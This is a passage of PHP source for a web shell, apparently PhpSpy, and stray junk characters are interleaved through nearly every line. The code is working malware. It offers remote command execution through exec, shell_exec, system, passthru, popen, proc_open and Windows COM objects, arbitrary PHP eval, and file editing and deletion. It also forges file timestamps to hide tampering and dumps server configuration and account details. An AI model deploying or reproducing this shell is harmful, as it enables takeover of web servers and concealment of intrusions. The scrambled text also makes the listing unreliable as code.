}+ g! w2 U! R: v( U
formhead(array('title'=>'Eval PHP Code'));2 _3 W6 |9 s0 f0 _+ c0 o
makehide('action','eval');
* q, \) y' K6 c+ ]) y. X0 O! G
maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
6 W/ h0 c) H) [) E' f
p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
- x1 [' ^: L* @- O9 [
formfooter();
$ `3 c6 k# f7 K: T( X' ?
}//end eval H* v1 ], c) U9 j0 e9 C
7 @6 h/ T4 X' d+ z- F
elseif ($action == 'editfile') {
9 t. i3 T. l, Y/ E) c5 _' ?
if(file_exists($opfile)) {
" b/ l+ t" v+ T% U' v. W
$fp=@fopen($opfile,'r');0 W) b3 ]3 K7 W( r
$contents=@fread($fp, filesize($opfile));5 o" g+ \- g# E1 \. Z, |5 Q1 c
@fclose($fp);
% A# T; t! H: j ?! ~
$contents=htmlspecialchars($contents);
' C/ m% y& Y: ~. a1 p: s
}
" k; Q1 Z$ q5 q7 C
formhead(array('title'=>'Create / Edit File'));
) J; v9 Y+ G( t
makehide('action','file');! m. ]: }: M% D3 m* e' x- q; [
makehide('dir',$nowpath);0 s2 l) @* F' j
makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));2 ~# W2 Y5 f6 Z7 s
maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
0 u; W3 Q( h/ Q6 a6 A# T
formfooter();
. q: B' Q! V1 I
}//end editfile
0 x8 n! X3 n* s. z
+ Y' n) X+ x! p0 [1 \( |% z4 ~
elseif ($action == 'newtime') {
& D1 M7 O9 P( o( {1 x2 j
$opfilemtime = @filemtime($opfile);
+ E$ \: w* u% D2 m
//$time = strtotime("$year-$month-$day $hour:$minute:$second");' m) P( n% _: Q2 A; M" [ P( P P
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
3 E6 z& ^' g) Z% `+ Z% R
formhead(array('title'=>'Clone file was last modified time'));" |+ D- a" j* K7 C( H& H8 t
makehide('action','file');
7 `5 s4 z: ?) e8 a) c% \$ D4 m
makehide('dir',$nowpath);
5 W3 u0 `2 J5 K9 |" G( ~; W8 R
makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));) q% r! N9 I6 S; d% h. A& o
makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));- p5 w+ x( q2 y! B
formfooter();
+ z( J& t- Q* ?: N, {( U) U2 l
formhead(array('title'=>'Set last modified'));
9 F5 r1 |8 u% n# R
makehide('action','file');
. k4 \4 I5 A, R/ k% p' T! W5 I
makehide('dir',$nowpath);4 E8 w+ o2 |2 a7 j4 d9 L% [! C
makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
/ v# ^; h& F2 w" v
p('<p>Instead »');* U6 b8 u* p: k9 S$ y2 ?$ s( C) i
p('year:');
% J& Y& ?: \, G2 `3 h7 u
makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));/ W8 y' Y1 U/ }; L1 N; u! \
p('month:');) R0 b4 k3 O+ f4 I
makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+ y8 | N% I. h# ~
p('day:');5 y1 i* T! h. N1 p6 r2 w1 z
makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));1 b# i; V m2 q0 G* P
p('hour:');
% I# Q, C; `7 k$ R; H. W3 G
makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
$ T6 k3 x- k( P) l" Z
p('minute:');; }# w* a8 m/ _1 h* w
makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));* P5 V" e; l `. u
p('second:');
1 W1 k2 g( p- f/ S
makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
; v, |+ U7 |) E: ` U6 T( p
p('</p>');3 l9 s9 n+ O) |+ V9 t# d6 `
formfooter();0 D, z6 X* p8 e5 f
}//end newtime
F, u/ d% [8 M* X4 B
$ G5 g7 ^1 {. L/ {5 e
elseif ($action == 'shell') {; y" n) j) h' V7 ~
if (IS_WIN && IS_COM) {0 D) U6 s! n1 ?5 e% V) k0 |9 R7 R
if($program && $parameter) {9 H/ Y7 S4 l6 S9 C
$shell= new COM('Shell.Application');
0 a$ |; c, D/ K8 Z: s1 k
$a = $shell->ShellExecute($program,$parameter);6 I) o/ `% O _; o1 t+ I
m('Program run has '.(!$a ? 'success' : 'fail'));
" ?! Q1 O9 Y0 N$ T ~. U
}9 B/ D: n5 w( R: r
!$program && $program = 'c:\windows\system32\cmd.exe';: e# i# M' Z* Q* _" g# ?
!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';- W6 E- {. w4 T/ J4 Q
formhead(array('title'=>'Execute Program'));
+ x$ s& Y7 A1 a; c: f+ W4 y4 q
makehide('action','shell');: ?: q V" ~' y( {
makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));1 D! d+ ? n0 V" m
p('<p>');
, S" J3 [1 s7 U
makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));2 U0 y9 ^ X, C2 D: v' r0 p' r) \
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
0 |- ^; a4 K$ D1 \
p('</p>');
: O8 U/ z/ E% A$ O/ @) O N
formfoot();, }% j- ]% J$ J# S1 t: @: [" P
}
: s/ S; ^6 n C
formhead(array('title'=>'Execute Command'));
6 } f$ z! @4 w9 I+ l! q+ @" v
makehide('action','shell');
9 b" b! I4 O+ F0 z% P2 o
if (IS_WIN && IS_COM) {* \/ D+ W0 ?" E# v7 U
$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');# U8 `( Q6 B/ i) o& W. @) y
makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));$ e: H: j- g% i$ M& I8 ]
}0 ]% {1 H2 @$ ?, q3 e# K2 L
p('<p>');
9 r% K8 ]5 o3 C. g& s. U. i: o1 ~
makeinput(array('title'=>'Command','name'=>'command','value'=>$command));5 t$ ~9 ]# [+ j( w4 @
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));8 k% J) Z. ]; K) M# l
p('</p>');( s* Z/ ]7 L0 {3 O; t
formfoot();
$ V- u1 w& F& ^9 A" E9 l/ h
$ E$ t9 Y9 g2 {8 Y
if ($command) {+ V1 r0 g/ ]5 R3 i' Q5 ^5 h/ g
p('<hr width="100%" noshade /><pre>');, b1 P% i, q! o0 a9 T' j; ~
if ($execfunc=='wscript' && IS_WIN && IS_COM) {# B/ p9 w) I- i
$wsh = new COM('WScript.shell');
! \9 n5 k; ^' T a& _
$exec = $wsh->exec('cmd.exe /c '.$command);" e. E& `9 k% ~) K' |
$stdout = $exec->StdOut();! o2 [' m' o/ J9 A
$stroutput = $stdout->ReadAll();1 ~# ?1 o. y9 i% r( |- d3 V
echo $stroutput;; N0 H& ~" j& n; _/ c
} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {8 b- m+ D8 @8 j
$descriptorspec = array(( w2 b2 M: V+ \8 }
0 => array('pipe', 'r'),! E" a; }7 m+ K8 N8 n- y
1 => array('pipe', 'w'),
4 c8 j. b2 j5 y, c$ h
2 => array('pipe', 'w')) w; H" @6 Y+ J: \0 X
);! y$ |' _$ m$ Z' ~7 M3 |" U
$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);) R/ D. B) m3 N+ e' A
if (is_resource($process)) {
# j* o% ^! O* L9 x. }
fwrite($pipes[0], $command."\r\n");
# j( o, b& X! C8 J
fwrite($pipes[0], "exit\r\n");
/ F8 o8 Y2 V( S' B
fclose($pipes[0]);
8 S* w K2 H; x o q) S1 C
while (!feof($pipes[1])) {
% K9 O* f- W2 b" V% i& S
echo fgets($pipes[1], 1024);
4 W, [) q1 z: O
}
8 b' z# t* _# P7 v7 C+ S5 S
fclose($pipes[1]);+ `( v7 I( a0 t( j+ |- w
while (!feof($pipes[2])) {: Z: S" y9 N) A9 w9 Q4 s2 i4 |
echo fgets($pipes[2], 1024);8 F; Y# S5 ~: i& O
}
& ~$ d" b$ j: p. R% y+ }6 I+ s* M
fclose($pipes[2]);0 @* x$ R; @' {
proc_close($process);5 A/ ~8 a7 k5 Z; c
}
\ H2 n- D5 r6 V% {
} else {/ F7 j9 ^+ P& W9 e& ?& c2 h2 z
echo(execute($command));! m5 f& m/ i5 B# g- @: F% Z+ P* v* F
}2 m9 `7 _9 |* L% }: M0 b
p('</pre>');% |% z5 ~7 Q) z
}
6 _% U# q$ y! R+ @
}//end shell
8 M8 G: y) Z3 ~( D
1 ]5 w2 o0 F8 u0 y" W) _
elseif ($action == 'phpenv') {
$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';( g% i8 ?* D7 i
$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');( D" E3 A. o4 K. J
!$dis_func && $dis_func = 'No'; # ^9 X5 G- ?4 ~4 L* e+ @; L; A
$info = array(
; @) V `' \" }" J# d, S) U+ n1 S+ P
1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
; }; q5 h* i8 I6 e* Q7 D4 E0 A3 k
2 => array('Server Domain',$_SERVER['SERVER_NAME']),
8 M* k' q3 m8 e8 E
3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),: M5 b, ~6 P9 d! y' [5 g
4 => array('Server OS',PHP_OS), `: h" ~! J3 t& m5 |: ~' F
5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
: j: d/ ` d2 b& b$ \1 S6 T) }5 Z; A
6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),6 ]- X( M! d* G- g& C8 m1 {! d$ D
7 => array('Server Web Port',$_SERVER['SERVER_PORT']),' Y6 s3 d( `. R$ q% x; O& J
8 => array('PHP run mode',strtoupper(php_sapi_name())),* b w6 \& M7 j
9 => array('The file path',__FILE__),
- k1 R9 w$ W8 Y- l4 h4 q% ]
/ g7 r1 ~$ X% j) ?: a$ Z% @
10 => array('PHP Version',PHP_VERSION),, U2 s6 j/ k; l8 m+ s( }8 G
11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
- }, Z* i2 w2 l; S, ]4 p, X
12 => array('Safe Mode',getcfg('safe_mode')),' a: L5 w7 s* F8 J" Y$ s
13 => array('Administrator',$adminmail),
" }; O) |* D& U. L k, X1 ]
14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
15 => array('enable_dl',getcfg('enable_dl')),
& \1 P( S2 Y* ^6 c6 Y7 z
16 => array('display_errors',getcfg('display_errors')),& H! c0 A2 s: w. N8 }2 D
17 => array('register_globals',getcfg('register_globals')),
( K) E( Q" V+ W: [
18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),# c7 G0 ~! m8 _& i0 @
19 => array('memory_limit',getcfg('memory_limit')),
1 X7 a/ m) I/ y) c
20 => array('post_max_size',getcfg('post_max_size')),& P y+ V0 e& `) @2 ?8 V' c& ]
21 => array('upload_max_filesize',$upsize),
( O4 G" x/ F4 u
22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
8 W l8 I3 q4 G: D
23 => array('disable_functions',$dis_func),
7 _/ F2 r M2 [0 P
);
0 t7 [1 P! t! A# g' `
& v. W4 E' S9 x! U/ F2 |9 Z1 ~
if($phpvarname) {, o c$ Z# A' c% h
m($phpvarname .' : '.getcfg($phpvarname));; O' @% K8 W8 A( q- C& ?
}! ~$ g2 u. M2 r7 |$ F9 x4 C
9 y9 s6 F" b2 `- S3 \# h
formhead(array('title'=>'Server environment'));2 f- z V) q% k: y; b
makehide('action','phpenv');
. a- T2 c, T: w/ k$ a% [+ c
makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
, _& Q& x6 \" X- }* L
formfooter();
$ Y' o# I0 u0 N3 h! p# f
' R8 r- W; T: _, |. y. W" x$ {6 g( G
$hp = array(0=> 'Server', 1=> 'PHP');& b$ ]6 v/ L1 C: C- N, E+ M( O$ Y- C+ I
for($a=0;$a<2;$a++) {6 Y% I* [3 }4 M& g
p('<h2>'.$hp[$a].' »</h2>');
/ \0 Z A Z$ e3 Y+ c& b
p('<ul class="info">');$ }- p) o4 [( z, p6 ~: C) j |
if ($a==0) {
4 W/ l: G x; Q5 ]& D
for($i=1;$i<=9;$i++) {0 ?! F1 f) A. {
p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');' {) q) A2 t9 X5 W
}
( G) S; C* x8 ]8 ^4 B
} elseif ($a == 1) {
2 f8 g6 q( ~+ m) [! @# i/ z
for($i=10;$i<=23;$i++) {
. u* @: @+ g5 Y5 l; m7 j& Q
p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');$ `* c+ K/ o( S9 n0 s4 t/ @
}
t# P: X8 n' l# R5 `' t
}
: c9 C% d! L% A/ k
p('</ul>');; o E3 c: o2 f# F7 Z/ w' T+ W% X, T
}+ o. E2 B1 \# U- K9 r
}//end phpenv
# \9 k! u" U- }; j9 `" \
8 I9 k; N+ D) l* U3 f
else {2 v" ^6 J/ ]& C5 k3 f
m('Undefined Action');
5 {. r% y. L' j; Y6 Q8 ~
}
2 m$ I, O: _* Q/ u, H0 g- J1 p( ^% S
- }" [- y; j t8 F3 x4 n
?>3 q% |9 y: G! t2 b$ r0 q# e
</td></tr></table>
4 e- K& @; K1 h
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
, ] D3 B' K$ p9 E! O k* m
<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1 u6 s, O- Z; |3 Y2 p/ A3 `
</div>6 G$ A/ u, S( [, c& U8 \0 |
</body>( `4 t) D9 m( J+ }
</html>
& \3 r( ], w3 r0 C+ F
/ M3 O0 [0 i8 {2 s" I) i
<?php1 b" z0 f# [* u( r G! p
7 G$ \5 s$ U& a' v$ `
/*======================================================6 ?* k0 Z8 ]+ |! y
函数库( A2 \9 Z$ {& s' ?4 W Y, R4 d
======================================================*/( f7 j- B- v: b% \0 K' J% m9 w, [
& s- z* D G, |0 G
function m($msg) {
- u9 | q2 c3 q/ a
echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
2 |# m9 P s. P& {, J# l
echo $msg;
# O. W- J: m/ L1 M' I. J
echo '</div>';
) I8 A7 j7 N: q) p* }4 p
}
0 f: L/ H1 B- R
function scookie($key, $value, $life = 0, $prefix = 1) {
$ q. R4 |, b0 R5 s9 s
global $admin, $timestamp, $_SERVER;
1 B5 J8 n: S% a0 K: B
$key = ($prefix ? $admin['cookiepre'] : '').$key;
0 n% @: f! `5 Z; W
$life = $life ? $life : $admin['cookielife'];
6 j. N8 u: G3 @4 C5 E
$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
4 Q0 m5 s) n1 F8 M
setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); j8 E$ g7 S9 Y) P9 i
} / a# ~* s6 {. G+ g7 M9 t( e9 L# u
function multi($num, $perpage, $curpage, $tablename) {
/ B) }5 T+ v0 g d2 @$ K: i0 l
$multipage = '';5 ]& ^6 y8 q- y( q+ ~
if($num > $perpage) {
* D! a: L' U7 f( I1 W
$page = 10;
3 b' j1 |% W8 S& K# c
$offset = 5;
) m% D$ M% k, T3 R* |, Z
$pages = @ceil($num / $perpage);
4 `/ w8 s1 u0 B5 h
if($page > $pages) {( @ ^+ p# w% b* l
$from = 1;
# S1 a9 h4 b$ w" @& x6 g a3 a& E
$to = $pages;# a8 X8 m& \0 z0 v: }
} else {$ y. `6 Z I- v2 m4 q( T/ {$ `" T
$from = $curpage - $offset;
8 I! h: _( w- p8 N# Q+ W
$to = $curpage + $page - $offset - 1;8 g) Z; T' k0 g S9 C I
if($from < 1) {
. p9 V8 p2 c; n5 j( B7 v- l
$to = $curpage + 1 - $from;
- l9 o( L, S$ ~2 V9 M4 Y
$from = 1;, E# z! A8 ^+ {
if(($to - $from) < $page && ($to - $from) < $pages) {5 W U" R5 C" E' o. v; F* c, A
$to = $page;
0 p) D! u# E6 H. Q/ P6 {" k
}
' @9 U3 [+ w. n6 P
} elseif($to > $pages) {% h1 T9 p' \9 u
$from = $curpage - $pages + $to;
* n0 Y" n9 l% G! w- F5 Z
$to = $pages;
1 ^! h8 ^% L: u( [- X2 e
if(($to - $from) < $page && ($to - $from) < $pages) {" ?5 V0 L* a, Y& I$ [# n% t
$from = $pages - $page + 1;
& i& |4 C( \ E+ u6 W$ t6 K
}: u' b3 H* a: U
}9 L+ N) Q9 V3 J. x3 n
}0 { N; v X9 ~9 x( A7 D s0 O
$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');* Z9 v* [9 m/ P$ i3 `
for($i = $from; $i <= $to; $i++) {
4 H1 K: c% z* y9 M3 e% a+ \- b
$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';3 `" J1 U C# z+ f' x/ n- |
}: V2 n+ e. m8 [2 C" x
$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');4 y/ |- M8 h5 A: M e
$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';. t2 r h! w8 Z! h% g; j# K
}% W* V- h! x. F* y$ j
return $multipage;
' S+ j) g+ V8 r M9 U; c( _
}
4 F% q& _0 P2 F
// 登陆入口+ h- `- X/ ?1 }
function loginpage() {+ q, ?/ [# U( q' i6 C, g. C- T
?>' W; a& z! |, k( c! G7 u! J
<style type="text/css">
- s4 \7 w" s; s; I& p) t
input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}2 I& F* J N, V& y7 a
</style>
" z4 a M( v2 E# T
<form method="POST" action="">
% b$ M4 T& ^* g/ z3 N. q# r: F5 k
<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
0 U2 x( }) @" X, d/ C) o- t5 U( N
<input type="hidden" name="doing" value="login">3 O& m5 N- S' O' v }4 `
<input type="submit" value="Login">! A" J2 f! W& L/ `5 A) p
</form>7 ~2 R0 g" N$ Q, F
<?php$ S- m0 L' w6 k9 G
exit;
' Z4 X% ~6 q9 a3 X
}//end loginpage()+ Y6 c5 M. b( ^
& T" O$ B- `2 J! r h( F
function execute($cfe) {
) W9 X b. S7 ?7 q8 ]+ o
$res = '';# u/ l6 _3 v- A3 D' E, {4 a# d
if ($cfe) {6 Q9 H7 L, q0 A T. H- f
if(function_exists('exec')) {) e7 q% H, @6 A
@exec($cfe,$res);( [5 b% i1 f6 i8 {
$res = join("\n",$res);
- ?% ^/ d8 h W# N7 z
} elseif(function_exists('shell_exec')) {
8 r3 _7 d* l1 L2 N, ^; U
$res = @shell_exec($cfe);+ g1 A4 d- T) `6 [
} elseif(function_exists('system')) {) D% \3 E/ G, D; n7 L
@ob_start();& X5 `; W8 ~+ W
@system($cfe);: y5 }0 r; j, b
$res = @ob_get_contents();
n5 Y5 \! R/ Q8 }( ]( R! E
@ob_end_clean();
& K( ]0 S2 X# w2 }
} elseif(function_exists('passthru')) {3 o- ?/ k5 L/ a0 R4 ?
@ob_start();
6 |# {* u, D5 j# u
@passthru($cfe);4 `5 X& O' h- `, R
$res = @ob_get_contents();
* |" k$ O% F: z. `7 p2 {6 s7 u
@ob_end_clean();6 A+ y% p" I' i2 y+ f/ D' D; R
} elseif(@is_resource($f = @popen($cfe,"r"))) {0 K$ {# L& `; K8 p
$res = '';7 c# Q$ V. h, i' L& V0 U5 {* S
while(!@feof($f)) {
; n: B% g( I3 A! K4 p
$res .= @fread($f,1024); 3 L) {- ?: q o
}
* k2 Y+ d: f4 `# c& V
@pclose($f);6 p) v' v1 f/ P; x
}
; E1 W8 r% k: b0 o. N6 n% O, W
}
$ ]* G) n7 M6 n/ q$ P0 @
return $res;, ? {3 @% M+ Q9 g
}( p* X z: X9 q# z: N- h
function which($pr) {/ n1 b# z8 |5 `. o7 D( e0 G3 W& o* @
$path = execute("which $pr");
- W5 p/ h, ]3 t7 u
return ($path ? $path : $pr);
1 O7 E; R$ A) Z" }. M7 [& t
}
5 b& C0 q9 |" Z2 k) n9 C
. g S" Z; l' \# E r+ D3 ]
function cf($fname,$text){7 B Q; q+ i/ g3 K. b
if($fp=@fopen($fname,'w')) {
2 g, K8 {& V) G" ?/ e
@fputs($fp,@base64_decode($text));
+ p' j c/ {4 d$ h; ~0 }
@fclose($fp);
& l, x" R* W4 I, J5 H! E
}
6 u( H/ ~# v; z; Z$ g/ Y! y
}4 K: Q3 v& @; x# X6 w# l6 K
% u& X# J0 j$ U& S1 r
// 页面调试信息. r3 B( ]2 ^0 }. |% V8 W
function debuginfo() {2 {6 r, @6 y2 `4 `/ R
global $starttime;
* R& |. m/ ^5 r( w6 o% R
$mtime = explode(' ', microtime());
2 @9 B$ W( g' }. Q; ?
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);( f, f# k% i! k
echo 'Processed in '.$totaltime.' second(s)';
6 ^. S2 s7 p- v+ F3 c. {
}
: u! ~5 N8 E! [/ ^! c
2 e. Y7 Y( u4 b3 R5 P
//连接数据库
- H4 Y+ b: @5 V: t3 u
function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
7 G3 P+ k) B+ I; H8 ?
if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {: _3 @2 ~- \) J3 e2 [4 `3 N* |
p('<h2>Can not connect to MySQL server</h2>');, z$ a/ s( N- B; P/ G
exit;% w5 v! m7 H) g) O6 b# t# m$ g& X4 O
}
2 I1 O* E8 y1 k b) R
if($link && $dbname) {7 K+ d* N3 w+ j4 X7 _6 v% W6 W
if (!@mysql_select_db($dbname, $link)) {# g% a6 f" ^$ [3 r P
p('<h2>Database selected has error</h2>');
exit;
9 I) E1 k" D6 {6 Q- o9 l7 c
}9 M/ v a- f$ d" R
}
1 r- Z' U2 l Q/ y; @, P( m
if($link && mysql_get_server_info() > '4.1') {
% O4 ~( s& x$ d) _1 C
if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1 _! V F. {! K+ d# b/ W
q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);* k6 p" R8 X+ a5 \& J
}
9 S8 z1 l) i, A$ N# n- t
}
1 T7 X" i- p% o6 V5 ^
return $link;5 ` Q9 E1 E9 Y! @: P
}
- m( v1 Y4 w. b- E
! D& R+ g c3 O$ e) m
// 去掉转义字符1 [: ]/ n6 K4 z9 @ {+ {
function s_array(&$array) {
6 h. D; P' J) u6 j3 B
if (is_array($array)) {
6 ~. m+ M. E! ]& Q1 o2 ]& e
foreach ($array as $k => $v) {# @8 B, x! q, b0 U
$array[$k] = s_array($v);% z$ z5 H+ X1 D, _1 s- A* a
}8 M8 j+ { n h. i4 {
} else if (is_string($array)) {+ C+ r7 D2 k8 _) l4 n, b8 w
$array = stripslashes($array);1 d+ \; u9 R3 `$ c5 s; j1 c
}
$ s3 h' x' p- p" k" b+ }
return $array;
_2 W% v( Z. }! |* P! k
}2 q4 G5 H/ J1 @2 p& b6 K9 H
. y$ w! v" `: O e
// 清除HTML代码
! ~& f# i. D4 ]. U3 l( L
function html_clean($content) {
. y0 p. k `! l& m6 T5 \0 B3 g
$content = htmlspecialchars($content);
3 @7 j# u6 o. A$ b6 p6 [4 Z5 c: R
$content = str_replace("\n", "<br />", $content);# Q7 y/ p7 d2 m" A
$content = str_replace(" ", " ", $content);
) z" k; `- W, H
$content = str_replace("\t", " ", $content);
( K4 L; P* E+ V$ A: R+ }" C4 D
return $content;
) O ]" U8 F$ I
}
$ V v5 L$ V7 b0 i: `* ?# l) p
u9 }* F4 v2 w: u* N- Y, ^
// 获取权限" F% m* T8 J: s) a5 x+ i) P" J
function getChmod($filepath){
5 W" l/ `2 U! M" E/ }! m4 u
return substr(base_convert(@fileperms($filepath),10,8),-4);! l# \8 D7 e' C
}
0 |+ B, s; B/ G. Q7 H8 g/ @
, A! F! A; G4 _- S
function getPerms($filepath) {
! T! p% @1 ^. I$ L$ e6 l8 K: D
$mode = @fileperms($filepath);
+ m9 k* k: ?4 e0 ~$ B
if (($mode & 0xC000) === 0xC000) {$type = 's';}
/ O1 ~4 }# H$ L1 E& X
elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}7 x0 k- z% {; f
elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}9 C. ~0 @, [% r4 E% N
elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
% h, Y% W3 W J' o0 b- ]" m6 N8 H
elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
; {( G- N+ w2 C5 V, A3 ^* R
elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
' \ X9 f$ \) R7 }
elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}8 d4 I' L+ Y, B% V* w
else {$type = '?';}, R. \! L1 n) w
6 R, J7 K% x8 l
$owner['read'] = ($mode & 00400) ? 'r' : '-';
# S" }! M2 P5 d
$owner['write'] = ($mode & 00200) ? 'w' : '-';
! z8 I% f( P0 b/ p
$owner['execute'] = ($mode & 00100) ? 'x' : '-'; * \0 g+ H/ {% ?( V( {, \
$group['read'] = ($mode & 00040) ? 'r' : '-';
4 N5 @) c( X9 p0 a
$group['write'] = ($mode & 00020) ? 'w' : '-'; # H$ f9 m6 q5 x
$group['execute'] = ($mode & 00010) ? 'x' : '-'; / m* e# M/ M2 w" T$ A) J
$world['read'] = ($mode & 00004) ? 'r' : '-';
2 }" x5 ]- f6 d" n
$world['write'] = ($mode & 00002) ? 'w' : '-';
) o8 s, u8 E+ T' p9 F, k2 ?- g
$world['execute'] = ($mode & 00001) ? 'x' : '-'; ) m: x- K( K4 L& c7 B
- s H- |: s. H9 K$ F) V0 J$ ^
if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
# p* g: V+ M3 ^! z0 d& S7 z# r
if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
3 L2 [3 x, ~ l- p5 f# b
if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}- v: z* S& \# O+ {3 X3 G
4 d$ h! Y2 B$ |: x+ a5 g
return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
# |! r% ]3 j8 d m/ K
}: i! ~% g0 r4 A* K4 w
. K' A7 E5 w3 Q- `
function getUser($filepath) {% @) p& k9 h8 F6 h) ?/ z' g' _
if (function_exists('posix_getpwuid')) {
5 Z S1 g4 P6 R" u) V8 X) t
$array = @posix_getpwuid(@fileowner($filepath));
/ o! B' t, a K) z0 q1 t
if ($array && is_array($array)) {8 R. E$ r V, k- o! X+ Z' F2 F
return ' / <a href="#" title="User: '.$array['name'].'
7 U0 M0 V! l4 s/ E" G
Passwd: '.$array['passwd'].'$ O0 ~4 y) \* A5 Y5 Y% Q: U
Uid: '.$array['uid'].'$ j6 [& \5 N {
gid: '.$array['gid'].'
+ v k* M: _7 v
Gecos: '.$array['gecos'].'
/ T& I/ _$ l5 Q$ V' M; q
Dir: '.$array['dir'].'
* R: j4 [) E8 g* x
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
u7 b+ |0 _. q- x1 p+ l! N
}
) ]3 E8 ~, Z* U/ O5 P
}
6 g+ ]6 U" C5 K8 N7 w, l' p" z
return '';0 d, A; J$ r j t: v+ Q
}
$ J1 A% V" K! O, C8 ]2 c: i
3 E3 g) R, z2 B+ y$ i$ N6 {
// 删除目录
+ [7 O2 K' Z6 V
function deltree($deldir) {. {6 P" C% L! q- ^/ I
$mydir=@dir($deldir); / [ G4 {2 m& k, W
while($file=$mydir->read()) {
7 k) `8 ]6 I" n' u3 I1 l
if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
) O+ u4 l$ \' `$ X( c
@chmod($deldir.'/'.$file,0777);, D* }0 H8 ^! W* X: f. U# H9 }6 ~
deltree($deldir.'/'.$file); 8 B* k. v/ }) U k
}
* K9 G1 b( s' K% X. J# w
if (is_file($deldir.'/'.$file)) {
* q) U/ H* o, t# R
@chmod($deldir.'/'.$file,0777);! R/ |6 F! K# W5 d
@unlink($deldir.'/'.$file);
* E" g# {- N: Q- e
}0 O8 H% m* o% x
} . m, [# f+ [) x; @; K4 R
$mydir->close(); 9 y* q! t7 b' ]
@chmod($deldir,0777);! C. n+ M' y m! S1 T
return @rmdir($deldir) ? 1 : 0;
+ ^; r" J7 x& `( f; u5 ] b
}# L3 Y% w" Y! o9 U! P
9 q# `* g8 m8 g; h6 }
// 表格行间的背景色替换
, s! K9 m4 h5 V5 A: K, y, H' \
function bg() {
